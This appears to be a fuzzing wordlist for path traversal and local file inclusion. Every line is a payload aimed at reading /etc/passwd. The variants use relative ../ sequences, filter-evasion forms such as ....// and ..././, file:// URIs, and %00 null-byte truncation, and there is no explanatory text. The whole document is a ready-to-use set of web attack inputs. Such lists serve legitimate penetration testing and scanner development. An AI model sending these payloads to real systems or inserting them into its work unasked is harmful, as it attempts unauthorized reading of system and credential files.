/etc/passwd
../etc/passwd
../../etc/passwd
../../../etc/passwd
//etc/passwd
....//etc/passwd
....//....//etc/passwd
....//....//....//....//etc/passwd
//etc/passwd
..//etc/passwd
..//..//etc/passwd
..//..//..//..//etc/passwd
..././etc/passwd
..././..././etc/passwd
..././..././..././etc/passwd
file://etc/passwd
file:///etc/passwd
file://../etc/passwd
file://../../etc/passwd
file://../../../etc/passwd
/etc/passwd%00
../etc/passwd%00
../../etc/passwd%00
../../../etc/passwd%00
//etc/passwd%00
....//etc/passwd%00
....//....//etc/passwd%00
....//....//....//....//etc/passwd%00
//etc/passwd%00
..//etc/passwd%00
..//..//etc/passwd%00
..//..//..//..//etc/passwd%00
file://etc/passwd%00
file:///etc/passwd%00
file://../etc/passwd%00
file://../../etc/passwd%00
file://../../../etc/passwd%00
